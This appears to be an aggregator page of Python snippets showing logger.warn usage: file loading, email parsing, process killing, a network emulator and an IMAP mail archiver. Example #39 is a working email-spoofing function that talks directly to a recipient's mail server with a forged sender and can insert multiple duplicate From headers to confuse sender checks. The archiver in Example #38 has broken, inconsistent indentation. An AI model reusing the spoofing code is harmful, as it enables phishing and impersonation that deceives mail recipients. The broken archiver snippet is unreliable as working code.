         fp = open(f, 'r')
       except IOError:
         logger.warn("Failed to load %s for %s" % (f, label))
         self.__data[label] = None
         raise DataNotAvailable("Failed to load %s for %s" % (f, label))
       self.__data[label] = fp.read().splitlines()
       fp.close()
     else:
       logger.warn("Suitable file for %s not found" % label)
       self.__data[label] = None
       raise DataNotAvailable("Suitable file for %s not found" % label)
Example #34
def get_email_domain(email):
    at_pos = email.find("@")
    if at_pos == -1:
        logger.warn("from_email format is invalid")
        return None
    return email[at_pos + 1:]
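Usage is straightforward; the addresses are illustrative:

print(get_email_domain("alice@example.com"))  # -> example.com
print(get_email_domain("not-an-email"))       # logs a warning, returns None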
Example #35
        logger.warn('can not find any running server')
    else:
        try:
            os.kill(pid1, signal.SIGKILL)
            os.kill(pid2, signal.SIGKILL)
        except Exception as e:
            logger.warn('error when killing %s: %s' % (pid1, e))
            logger.warn('error when killing %s: %s' % (pid2, e))
        else:
            logger.info('Process udp and tcp killed')
            try:
                os.remove('/tmp/udp.pid')
                os.remove('/tmp/tcp.pid')
                sys.exit(0)
            except OSError as e:
                logger.warn('remove pid file failed: %s' % e)


class Emulator():
    def __init__(self, ifname, host, ip, send_err, file_path, test):
        self.ifname = ifname
        self.host = host
        self.ip = ip
        self.send_err = send_err
        self.file_path = file_path
        self.test = test

    def run(self):
        UDPServer(self.ifname, self.ip, self.test).start()
        TCPClient(self.host, self.ip, self.send_err,
                  self.file_path, self.test).start()
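A hypothetical startup of the emulator, with interface and address values chosen purely for illustration:

Emulator(ifname='eth0', host='192.0.2.1', ip='192.0.2.10',
         send_err=False, file_path='/tmp/data', test=True).run()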
Example #36
 def reconnect(self):
     self.io_loop.add_timeout(
         datetime.timedelta(seconds=1),
         self.connect
     )
     logger.warn('Reestablishing TCP connection to %s' % repr(self.target))
Example #37
def error(update, err):
    logger.warn('Update "%s" caused error "%s"' % (update, err))
Example #38
def run_archiver(parents=[], logger=logger):

    # if we're given parents, third-party sw wants to mix with the barebones parser
    bbones = bool(parents)
    argparser = get_parser(parents=parents, barebones=bbones)
    args = argparser.parse_args()

    loglevel = getattr(logging, args.loglevel.upper())
    logger.setLevel(loglevel)

    # Require either archival or listing operation before proceeding.
    if not (args.list_folders or args.archivedir):
        argparser.print_help()
        sys.exit()

    # Auth & connect
    username = args.username or raw_input("Username: ")
    # (password prompt and IMAP connection masked with "******" in the original listing)
    logger.info("Connected")

       # Get folder listing and folder path separator from server; they will be needed.
       # Also make a slash ('/') -delimited list of all folders for convenience.
       # Note: an IMAP folder entry contains the full path, not just the leaf.
       folders = [fdata[2] for fdata in imapcon.list_folders()]
       fsep = imapcon.namespace().personal[0][1]
       folders_slashdelimited = [fname.replace(fsep, u'/') for fname in folders]

       # If requested (-f/--folders), just output it & exit
       if args.list_folders:
          sys.exit("Folders on server: %s" % ", ".join(folders_slashdelimited))

       # Apply include/exclude options on the list of folders found on server, after
       # making sure they exist on server.
       invalids = []
       if args.include:
           invalids += [fld for fld in args.include if fld not in folders_slashdelimited]
       if args.exclude:
           invalids += [fld for fld in args.exclude if fld not in folders_slashdelimited]
       if invalids:
           sys.exit("Invalid include/exclude folder names: '%s'" % invalids)
       folders = args.include or (set(folders_slashdelimited) - set(args.exclude))

       # Archive messages!
       logger.info("Archiving '%s' to %s" % ("', '".join(folders), args.archivedir))
       archive = mailbox.Maildir(args.archivedir)
       for foldername in folders:
           select_info = imapcon.select_folder(foldername)
           if select_info['EXISTS'] == 0:
               logger.info("Folder %s: no messages!" % foldername)
               continue

           uids = imapcon.fetch("1:%s" % select_info['EXISTS'], ['UID',])
           logger.info("Folder %s: %i messages on server" % (foldername, len(uids)))
           logger.debug("... fetching uids for 1-%s" %(select_info['EXISTS'],))

           uidvalidity = select_info['UIDVALIDITY']
           logger.debug("... UID validity: %s" % uidvalidity)

           parts = [makeFSCompatible(unicode(prt)) for prt in foldername.split(fsep)]
           fsname = '.'.join(parts)

           with mailfolder(archive, fsname) as (folder, cached_uid_info):
               newuids = [id for id in uids if ((uidvalidity, id) not in cached_uid_info)]
               oldcount, newcount = len(cached_uid_info), len(newuids)
               logger.info("... %i archived messages, %i new" % (oldcount, newcount))

               # use batched logging
               fetched = []
               interval = 1
               if len(newuids) > 100:
                   interval = int(math.sqrt(len(newuids)))
                   logger.warn("... using batched logging (entry per %i msgs)" % interval)

               for i, uid in enumerate(newuids):
                   fetch_info = imapcon.fetch(uid, ["BODY.PEEK[]",])
                   logger.debug("... info: %s" % fetch_info)
                   msg = fetch_info[uid]["BODY[]"]

                   # If a message cannot be stored, skip it instead of failing
                   try:
                       folder.add(msg)
                       cached_uid_info.append((uidvalidity,uid))
                    except Exception as e:
                        logger.error("... error storing mail: %s\n%s" % (msg, e))

                   fetched.append(str(uid))
                   if not (i % interval):
                       logger.info("... got message(s): %s" % ", ".join(fetched))
                       fetched = []
Example #39
def spoof(mail_from,
          to_email,
          subject,
          content,
          mime_from=None,
          mime_from1=None,
          mime_from2=None,
          sender=None,
          helo=None,
          filename=None):
    from_domain = get_email_domain(mail_from)
    if from_domain is None:
        logger.warn("Invalid FROM domain: " + mail_from)

    to_domain = get_email_domain(to_email)
    if to_domain is None:
        logger.warn("Invalid TO domain: " + to_email)

    mx_domain = get_mx(to_domain)
    # print("mx_domain:",mx_domain)
    if mx_domain is None:
        logger.warn("Can't not resolve mx: " + to_domain)

    # start
    smtp = Smtp(mx_domain)

    if not helo:
        helo = from_domain
    if helo:
        smtp.cmd("HELO " + helo)
    else:
        smtp.cmd("HELO " + 'test1.com')
    smtp.cmd("MAIL FROM: <{}>".format(mail_from))
    smtp.cmd("RCPT TO: <" + to_email + ">")
    smtp.cmd("DATA")
    nowdt = datetime.datetime.now()
    nowtuple = nowdt.timetuple()
    nowtimestamp = time.mktime(nowtuple)
    t = utils.formatdate(nowtimestamp)
    msg = MIMEMultipart()
    smtp.cmdonly("Date: {}".format(t))
    if mime_from1:
        smtp.cmdonly("From: {}".format(mime_from1))
    smtp.cmdonly("From: {}".format(mime_from))
    if mime_from2:
        smtp.cmdonly("From: {}".format(mime_from2))
    if sender:
        smtp.cmdonly("Sender: {}".format(sender))
    smtp.cmdonly("To: <{}>".format(to_email))
    subject = Header(subject, "UTF-8").encode()
    smtp.cmdonly("Subject: {}".format(subject))

    msg['Date'] = t
    msg['From'] = mime_from
    msg['To'] = to_email
    msg['Subject'] = subject
    smtp.cmdonly('Content-Type: text/plain; charset="utf-8"')
    smtp.cmdonly("MIME-Version: 1.0")
    _attach = MIMEText(content, 'utf-8')
    msg.attach(_attach)
    if filename:
        att1 = MIMEText(
            open('./uploads/' + filename, 'rb').read(), 'base64', 'utf-8')
        att1["Content-Type"] = 'application/octet-stream'
        att1["Content-Disposition"] = 'attachment; filename="{}"'.format(
            filename)
        # content = msg.as_string()+att1.as_string()
        msg.attach(att1)
    # else:
    #     content = msg.as_string()
    content = msg.as_string()
    # smtp.cmdonly("")
    smtp.cmdonly(content)
    smtp.cmd(".")
    smtp.cmd("quit")
    smtp.interact()